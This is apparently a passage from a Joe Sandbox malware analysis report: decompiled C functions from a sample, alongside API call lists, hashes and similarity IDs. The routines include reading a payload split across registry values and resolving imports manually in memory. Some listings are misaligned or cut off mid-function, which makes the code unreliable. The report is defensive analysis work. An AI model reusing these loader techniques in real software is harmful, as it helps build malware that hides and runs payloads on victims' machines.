                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$9
                                                                                                                                  • API String ID: 3120068967-1823400153
                                                                                                                                  • Opcode ID: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction ID: 1c52575e259da486ba6c398081418c2db578d6301d08719f2cdf30cb48880645
                                                                                                                                  • Opcode Fuzzy Hash: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction Fuzzy Hash: 1D4116F1E001299FDB64CF49D841BAEB7B5FF85314F40459AD188AB241C7785E81CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			// Decompiled by Joe Sandbox; comments added for readability.
                                                                                                                                   			// Copies the local hostname into _a4, keeping only the bytes
                                                                                                                                   			// [A-Za-z0-9.], strips one trailing '.', and falls back to the
                                                                                                                                   			// literal "LocalHost" when gethostname() fails or the result is empty.
                                                                                                                                   			E0040AD08(CHAR* _a4) {
                                                                                                                                   				char _v132;        // 0x80-byte buffer filled by gethostname()
                                                                                                                                   				int _t9;
                                                                                                                                   				char _t11;         // current source byte
                                                                                                                                   				intOrPtr* _t12;    // read cursor into _v132
                                                                                                                                   				CHAR* _t13;        // write cursor into _a4
                                                                                                                                   				CHAR* _t14;        // start of the destination (_a4)
                                                                                                                                   
                                                                                                                                   				_t9 = gethostname( &_v132, 0x80);
                                                                                                                                   				if(_t9 != 0) {
                                                                                                                                   					// gethostname() failed (non-zero return): only apply the fallback
                                                                                                                                   					_t14 = _a4;
                                                                                                                                   					L15:
                                                                                                                                   					if( *_t14 != 0) {
                                                                                                                                   						return _t9;
                                                                                                                                   					}
                                                                                                                                   					return lstrcpyA(_t14, "LocalHost");
                                                                                                                                   				}
                                                                                                                                   				_t13 = _a4;
                                                                                                                                   				_t11 = _v132;
                                                                                                                                   				_t12 =  &_v132;
                                                                                                                                   				_t14 = _t13;
                                                                                                                                   				// Filter loop: copy 'a'-'z', 'A'-'Z', '0'-'9' and '.'; drop any other byte
                                                                                                                                   				while(_t11 != 0) {
                                                                                                                                   					if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                   						if(_t11 < 0x41 || _t11 > 0x5a) {
                                                                                                                                   							if(_t11 < 0x30 || _t11 > 0x39) {
                                                                                                                                   								if(_t11 != 0x2e) {
                                                                                                                                   									goto L10;
                                                                                                                                   								}
                                                                                                                                   							}
                                                                                                                                   						}
                                                                                                                                   						goto L9;
                                                                                                                                   					} else {
                                                                                                                                   						L9:
                                                                                                                                   						 *_t13 = _t11;
                                                                                                                                   						_t13 =  &(_t13[1]);
                                                                                                                                   						L10:
                                                                                                                                   						_t12 = _t12 + 1;
                                                                                                                                   						_t11 =  *_t12;
                                                                                                                                   						continue;
                                                                                                                                   					}
                                                                                                                                   				}
                                                                                                                                   				// Trailing-'.' check as recovered by the decompiler: the byte tested is
                                                                                                                                   				// the one at index lstrlenA(), i.e. the position of the terminator
                                                                                                                                   				_t9 = lstrlenA(_t14);
                                                                                                                                   				if(_t14[_t9] == 0x2e) {
                                                                                                                                   					_t9 = lstrlenA(_t14);
                                                                                                                                   					_t14[_t9] = 0;
                                                                                                                                   				}
                                                                                                                                   				goto L15;
                                                                                                                                   			}

                                                                                                                                  0x0040ad1c
                                                                                                                                  0x0040ad24
                                                                                                                                  0x0040ad71
                                                                                                                                  0x0040ad74
                                                                                                                                  0x0040ad77
                                                                                                                                  0x0040ad88
                                                                                                                                  0x0040ad88
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad7f
                                                                                                                                  0x0040ad26
                                                                                                                                  0x0040ad29
                                                                                                                                  0x0040ad2c
                                                                                                                                  0x0040ad2f
                                                                                                                                  0x0040ad55
                                                                                                                                  0x0040ad35
                                                                                                                                  0x0040ad3d
                                                                                                                                  0x0040ad45
                                                                                                                                  0x0040ad4d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad4d
                                                                                                                                  0x0040ad45
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad51
                                                                                                                                  0x0040ad52
                                                                                                                                  0x0040ad52
                                                                                                                                  0x0040ad53
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad53
                                                                                                                                  0x0040ad35
                                                                                                                                  0x0040ad60
                                                                                                                                  0x0040ad66
                                                                                                                                  0x0040ad69
                                                                                                                                  0x0040ad6b
                                                                                                                                  0x0040ad6b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$gethostnamelstrcpy
                                                                                                                                  • String ID: LocalHost
                                                                                                                                  • API String ID: 3695455745-3154191806
                                                                                                                                  • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                                                                  • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			// Decompiled by Joe Sandbox; comments added for readability.
                                                                                                                                   			// Reads a payload that is stored split across several registry values
                                                                                                                                   			// under _a4\_a8. The value names are built from the prefix _a12 (at most
                                                                                                                                   			// 0x1c bytes) followed by a decimal index (E0040F1ED with radix 0xa is
                                                                                                                                   			// likely an itoa-style helper). Pass 1 sums the value sizes, E0040DB2E
                                                                                                                                   			// allocates a buffer whose pointer lands in *0x4136c4, pass 2 reads the
                                                                                                                                   			// chunks back to back, and if every byte was read the blob is handed
                                                                                                                                   			// to E00402544 / E0040E332. Returns 1 on success, 0 otherwise.
                                                                                                                                   			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
                                                                                                                                   				int* _v8;          // running value index
                                                                                                                                   				int _v12;          // pass 1: size of the current value; pass 2: write pointer
                                                                                                                                   				void* _v16;        // opened HKEY
                                                                                                                                   				intOrPtr _v20;     // points at the index suffix inside _v68
                                                                                                                                   				int _v24;          // value type (unused)
                                                                                                                                   				int _v28;          // remaining buffer size passed to RegQueryValueExA
                                                                                                                                   				int _v32;          // total payload size
                                                                                                                                   				int* _v36;         // return value
                                                                                                                                   				char _v68;         // value-name buffer (prefix + decimal index)
                                                                                                                                   				intOrPtr* _t52;
                                                                                                                                   				void* _t56;        // added: used below but omitted by the decompiler
                                                                                                                                   				int _t69;
                                                                                                                                   				intOrPtr _t75;
                                                                                                                                   				int _t78;
                                                                                                                                   				intOrPtr _t80;
                                                                                                                                   				void* _t82;
                                                                                                                                   				void* _t84;
                                                                                                                                   				void* _t85;
                                                                                                                                   				int _t89;          // pass 1: total size; pass 2: bytes still to read
                                                                                                                                   				void* _t91;
                                                                                                                                   				void* _t92;
                                                                                                                                   				void* _t93;
                                                                                                                                   				int _t106;         // added: used below but omitted by the decompiler
                                                                                                                                   
                                                                                                                                   				_t82 = __edx;
                                                                                                                                   				_v36 = 0;
                                                                                                                                   				// 0x20119 = KEY_READ | KEY_WOW64_64KEY
                                                                                                                                   				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
                                                                                                                                   					L16:
                                                                                                                                   					return _v36;
                                                                                                                                   				}
                                                                                                                                   				// Inline strlen(_a12), capped at 0x1c so the index still fits in _v68
                                                                                                                                   				_t52 = _a12;
                                                                                                                                   				_t89 = 0;
                                                                                                                                   				_t6 = _t52 + 1; // 0x4128f9
                                                                                                                                   				_t84 = _t6;
                                                                                                                                   				do {
                                                                                                                                   					_t80 =  *_t52;
                                                                                                                                   					_t52 = _t52 + 1;
                                                                                                                                   				} while (_t80 != 0);
                                                                                                                                   				_t85 = _t52 - _t84;
                                                                                                                                   				_v8 = 0;
                                                                                                                                   				if(_t85 > 0x1c) {
                                                                                                                                   					_t85 = 0x1c;
                                                                                                                                   				}
                                                                                                                                   				E0040EE08( &_v68, _a12, _t85);
                                                                                                                                   				_t56 = _t91 + _t85 - 0x40;
                                                                                                                                   				_v12 = 0;
                                                                                                                                   				_v20 = _t91 + _t85 - 0x40;
                                                                                                                                   				E0040F1ED(0, _t56, 0xa);
                                                                                                                                   				_t93 = _t92 + 0x18;
                                                                                                                                   				// Pass 1: query sizes only (lpData = 0) for <prefix>0, <prefix>1, ...
                                                                                                                                   				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
                                                                                                                                   					L15:
                                                                                                                                   					RegCloseKey(_v16);
                                                                                                                                   					goto L16;
                                                                                                                                   				} else {
                                                                                                                                   					do {
                                                                                                                                   						_t89 = _t89 + _v12;
                                                                                                                                   						_v8 = _v8 + 1;
                                                                                                                                   						_v12 = 0;
                                                                                                                                   						E0040F1ED(_v8, _v20, 0xa);
                                                                                                                                   						_t93 = _t93 + 0xc;
                                                                                                                                   					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
                                                                                                                                   					if(_t89 <= 0) {
                                                                                                                                   						goto L15;
                                                                                                                                   					}
                                                                                                                                   					_v32 = _t89;
                                                                                                                                   					E0040DB2E(_t89);
                                                                                                                                   					_t69 =  *0x4136c4; // 0x0
                                                                                                                                   					if(_t69 == 0) {
                                                                                                                                   						goto L15;
                                                                                                                                   					}
                                                                                                                                   					// Pass 2: read each chunk into the buffer, advancing the write pointer
                                                                                                                                   					_v12 = _t69;
                                                                                                                                   					_v8 = 0;
                                                                                                                                   					while(1) {
                                                                                                                                   						_v28 = _t89;
                                                                                                                                   						E0040F1ED(_v8, _v20, 0xa);
                                                                                                                                   						_t93 = _t93 + 0xc;
                                                                                                                                   						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
                                                                                                                                   							break;
                                                                                                                                   						}
                                                                                                                                   						_t78 = _v28;
                                                                                                                                   						if(_t78 == 0) {
                                                                                                                                   							break;
                                                                                                                                   						}
                                                                                                                                   						_v12 =  &(_v12[_t78]);
                                                                                                                                   						_t89 = _t89 - _t78;
                                                                                                                                   						_v8 = _v8 + 1;
                                                                                                                                   						if(_t89 > 0) {
                                                                                                                                   							continue;
                                                                                                                                   						}
                                                                                                                                   						break;
                                                                                                                                   					}
                                                                                                                                   					// Only if the whole payload was read back is it processed
                                                                                                                                   					_t106 = _t89;
                                                                                                                                   					if(_t89 == 0) {
                                                                                                                                   						_t75 =  *0x4136c4; // 0x0
                                                                                                                                   						E00402544(_t75, _t75, _v32, 0xe4, 0xc8);
                                                                                                                                   						E0040E332(_t82, _t106,  *0x4136c4, _v32);
                                                                                                                                   						_v36 = 1;
                                                                                                                                   					}
                                                                                                                                   					goto L15;
                                                                                                                                   				}
                                                                                                                                   			}

                                                                                                                                  0x0040e3ca
                                                                                                                                  0x0040e3e0
                                                                                                                                  0x0040e3ee
                                                                                                                                  0x0040e528
                                                                                                                                  0x0040e52d
                                                                                                                                  0x0040e52d
                                                                                                                                  0x0040e3f4
                                                                                                                                  0x0040e3f9
                                                                                                                                  0x0040e3fb
                                                                                                                                  0x0040e3fb
                                                                                                                                  0x0040e3fe
                                                                                                                                  0x0040e3fe
                                                                                                                                  0x0040e400
                                                                                                                                  0x0040e401
                                                                                                                                  0x0040e407
                                                                                                                                  0x0040e409
                                                                                                                                  0x0040e40f
                                                                                                                                  0x0040e413
                                                                                                                                  0x0040e413
                                                                                                                                  0x0040e41c
                                                                                                                                  0x0040e421
                                                                                                                                  0x0040e429
                                                                                                                                  0x0040e42c
                                                                                                                                  0x0040e42f
                                                                                                                                  0x0040e43a
                                                                                                                                  0x0040e452
                                                                                                                                  0x0040e51d
                                                                                                                                  0x0040e520
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e45b
                                                                                                                                  0x0040e463
                                                                                                                                  0x0040e469
                                                                                                                                  0x0040e46e
                                                                                                                                  0x0040e484
                                                                                                                                  0x0040e48a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e491
                                                                                                                                  0x0040e494
                                                                                                                                  0x0040e499
                                                                                                                                  0x0040e4a1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4a3
                                                                                                                                  0x0040e4a6
                                                                                                                                  0x0040e4a9
                                                                                                                                  0x0040e4ae
                                                                                                                                  0x0040e4b4
                                                                                                                                  0x0040e4b9
                                                                                                                                  0x0040e4d3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4d5
                                                                                                                                  0x0040e4da
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4dc
                                                                                                                                  0x0040e4df
                                                                                                                                  0x0040e4e1
                                                                                                                                  0x0040e4e6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4e6
                                                                                                                                  0x0040e4e8
                                                                                                                                  0x0040e4ea
                                                                                                                                  0x0040e4ec
                                                                                                                                  0x0040e500
                                                                                                                                  0x0040e50e
                                                                                                                                  0x0040e516
                                                                                                                                  0x0040e516
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4ea

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                                                                  • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586453840-0
                                                                                                                                  • Opcode ID: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                                                                  • Opcode Fuzzy Hash: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406069(_Unknown_base(*)()* _a4) {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				_Unknown_base(*)()* _t48;
                                                                                                                                  				_Unknown_base(*)()* _t50;
                                                                                                                                  				struct HINSTANCE__* _t52;
                                                                                                                                  				_Unknown_base(*)()* _t53;
                                                                                                                                  				_Unknown_base(*)()* _t54;
                                                                                                                                  				_Unknown_base(*)()* _t55;
                                                                                                                                  				signed int _t56;
                                                                                                                                  				_Unknown_base(*)()* _t59;
                                                                                                                                  				_Unknown_base(*)()* _t62;
                                                                                                                                  				_Unknown_base(*)()* _t63;
                                                                                                                                  				intOrPtr _t69;
                                                                                                                                  				_Unknown_base(*)()* _t76;
                                                                                                                                  				_Unknown_base(*)()* _t77;
                                                                                                                                  				intOrPtr* _t82;
                                                                                                                                  				void* _t85;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				_Unknown_base(*)()* _t89;
                                                                                                                                  
                                                                                                                                  				_t82 = _a4;
                                                                                                                                  				_t47 =  *_t82;
                                                                                                                                  				_t3 = _t82 + 4; // 0x65e85621
                                                                                                                                  				_t69 =  *_t3;
                                                                                                                                  				_v12 = 1;
                                                                                                                                  				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
                                                                                                                                  					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
                                                                                                                                  					_t48 = IsBadReadPtr(_t85, 0x14);
                                                                                                                                  					__eflags = _t48;
                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                  						L29:
                                                                                                                                  						return _v12;
                                                                                                                                  					}
                                                                                                                                  					_t87 = _t85 + 0x10;
                                                                                                                                  					_v8 = _t87;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t50 =  *(_t87 - 4);
                                                                                                                                  						__eflags = _t50;
                                                                                                                                  						if(_t50 == 0) {
                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  						_t52 = LoadLibraryA(_t50 + _t69);
                                                                                                                                  						_v16 = _t52;
                                                                                                                                  						__eflags = _t52 - 0xffffffff;
                                                                                                                                  						if(_t52 == 0xffffffff) {
                                                                                                                                  							L28:
                                                                                                                                  							_t44 =  &_v12;
                                                                                                                                  							 *_t44 = _v12 & 0x00000000;
                                                                                                                                  							__eflags =  *_t44;
                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  						_t10 = _t82 + 8; // 0x8bfffffa
                                                                                                                                  						_t53 =  *_t10;
                                                                                                                                  						__eflags = _t53;
                                                                                                                                  						if(_t53 != 0) {
                                                                                                                                  							_t14 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
                                                                                                                                  						} else {
                                                                                                                                  							_t11 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							_t54 = E0040EBCC(4 +  *_t11 * 4);
                                                                                                                                  						}
                                                                                                                                  						 *(_t82 + 8) = _t54;
                                                                                                                                  						__eflags = _t54;
                                                                                                                                  						if(_t54 == 0) {
                                                                                                                                  							goto L28;
                                                                                                                                  						} else {
                                                                                                                                  							_t18 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
                                                                                                                                  							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
                                                                                                                                  							_t55 =  *(_t87 - 0x10);
                                                                                                                                  							__eflags = _t55;
                                                                                                                                  							if(_t55 == 0) {
                                                                                                                                  								_t89 =  *_t87 + _t69;
                                                                                                                                  								__eflags = _t89;
                                                                                                                                  								_t76 = _t89;
                                                                                                                                  							} else {
                                                                                                                                  								_t89 = _t55 + _t69;
                                                                                                                                  								_t76 =  *_v8 + _t69;
                                                                                                                                  							}
                                                                                                                                  							_t56 =  *_t89;
                                                                                                                                  							__eflags = _t56;
                                                                                                                                  							if(_t56 == 0) {
                                                                                                                                  								L25:
                                                                                                                                  								__eflags = _v12;
                                                                                                                                  								if(_v12 == 0) {
                                                                                                                                  									goto L29;
                                                                                                                                  								}
                                                                                                                                  								_v8 = _v8 + 0x14;
                                                                                                                                  								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
                                                                                                                                  								__eflags = _t59;
                                                                                                                                  								if(_t59 == 0) {
                                                                                                                                  									_t87 = _v8;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								goto L29;
                                                                                                                                  							} else {
                                                                                                                                  								_a4 = _t76;
					_a4 = _a4 - _t89;
					__eflags = _t56;
					do {
						if(__eflags >= 0) {
							_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
							__eflags = _t62;
							if(_t62 == 0) {
								L21:
								_t63 = _a4;
								__eflags = *(_t63 + _t89);
								if( *(_t63 + _t89) == 0) {
									_t38 = &_v12;
									*_t38 = _v12 & 0x00000000;
									__eflags = *_t38;
									goto L25;
								}
								goto L22;
							}
							_t77 = _a4;
							__eflags = _t62 - *(_t77 + _t89);
							if(_t62 == *(_t77 + _t89)) {
								goto L21;
							}
							L20:
							*(_t77 + _t89) = _t62;
							goto L21;
						}
						_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
						_t77 = _a4;
						goto L20;
						L22:
						_t89 = _t89 + 4;
						_t56 = *_t89;
						__eflags = _t56;
					} while (__eflags != 0);
					goto L25;
				}
			}
		}
		goto L29;
	}
	return 1;
}

APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
• LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
• GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
• IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: Read$AddressLibraryLoadProc
• String ID:
• API String ID: 2438460464-0
• Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
• Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
• Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
• Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: __un_inc$__inc
• String ID:
• API String ID: 715532115-0
• Opcode ID: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
• Instruction ID: f942b1f4a04b6f0f9e0d70a22d6cc7c0db211ee0f9e66cba493c5219ac1b7685
• Opcode Fuzzy Hash: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
• Instruction Fuzzy Hash: 55418FB4E00518DFCF14DF69D8955EDB771AF84314F20C29BE82A9B381D639AA80CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
	signed int* _v8;
	signed int* _v12;
	signed int* _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	signed short _v28;
	short _v30;
	short _v32;
	char _v292;
	char _v296;
	void* __ebx;
	void* __edi;
	void* _t37;
	intOrPtr _t41;
	signed int* _t42;
	signed short _t53;
	signed int** _t62;
	void* _t67;
	void* _t70;
	intOrPtr _t71;
	intOrPtr* _t79;
	signed int* _t80;
	void* _t81;
	void* _t82;
	void* _t83;

	_t81 = __esi;
	_t37 = 0xc;
	_v8 = 0;
	_v16 = 0;
	if(_a4 >= _t37) {
		_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
		if(_t67 < _a4) {
			_t76 = *(__esi + 6) & 0x0000ffff;
			_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
			_v20 = _t41;
			_v12 = 0;
			if(_t41 <= 0) {
				L13:
				_t42 = _v16;
				L14:
                                                                                                                                  							return _t42;
                                                                                                                                  						}
                                                                                                                                  						while(_t67 < _a4) {
                                                                                                                                  							E0040EE2A(_t76,  &_v296, 0, 0x114);
                                                                                                                                  							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
                                                                                                                                  							_t15 = _t70 + 0xa; // 0xa
                                                                                                                                  							_t83 = _t82 + 0x10;
                                                                                                                                  							if(_t15 >= _a4) {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  							_t79 = __imp__#15;
                                                                                                                                  							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
                                                                                                                                  							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
                                                                                                                                  							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
                                                                                                                                  							_v28 = _t53;
                                                                                                                                  							_t71 = _t70 + 0xa;
                                                                                                                                  							_v24 = _t71;
                                                                                                                                  							if((_t53 & 0x0000ffff) + _t71 > _a4) {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
                                                                                                                                  							if(_t80 == 0) {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  							E0040EE2A(_t76, _t80, 0, 0x124);
                                                                                                                                  							E0040EE08(_t80,  &_v296, 0x114);
                                                                                                                                  							 *_t80 =  *_t80 & 0x00000000;
                                                                                                                                  							_t67 = _t71 + (_v28 & 0x0000ffff);
                                                                                                                                  							_t62 = _v8;
                                                                                                                                  							_t82 = _t83 + 0x18;
                                                                                                                                  							_v8 = _t80;
                                                                                                                                  							if(_t62 != 0) {
                                                                                                                                  								 *_t62 = _t80;
                                                                                                                                  							} else {
                                                                                                                                  								_v16 = _t80;
                                                                                                                                  							}
                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                  							if(_v12 < _v20) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L13;
                                                                                                                                  					}
                                                                                                                                  					_t42 = 0;
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}

                                                                                                                                  Instruction address column for the listing above (spilled out of alignment by extraction): 0x00402923 - 0x00402a5e

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
                                                                                                                                  • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                                                                  • Opcode Fuzzy Hash: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
                                                                                                                                  • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				CHAR* _t31;
                                                                                                                                  				int _t34;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                  				void* _t47;
                                                                                                                                  				intOrPtr _t51;
                                                                                                                                  				int _t52;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				void* _t55;
                                                                                                                                  				char _t59;
                                                                                                                                  
                                                                                                                                  				E0040DD05();
                                                                                                                                  				_t41 = 0x4120e8;
                                                                                                                                  				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
                                                                                                                                  				if(_t55 == 0) {
                                                                                                                                  					L9:
                                                                                                                                  					_t53 = E0040EBCC(0x1c);
                                                                                                                                  					if(_t53 != 0) {
                                                                                                                                  						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
                                                                                                                                  						 *((intOrPtr*)(_t53 + 4)) = _a8;
                                                                                                                                  						E00403E8F(0x4120e8, _t53);
                                                                                                                                  						__eflags = _a12;
                                                                                                                                  						if(_a12 == 0) {
                                                                                                                                  							 *(_t53 + 8) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t15 = _t53 + 8; // 0x8
                                                                                                                                  							lstrcpynA(_t15, _a12, 0xf);
                                                                                                                                  							 *((char*)(_t53 + 0x17)) = 0;
                                                                                                                                  						}
                                                                                                                                  						L15:
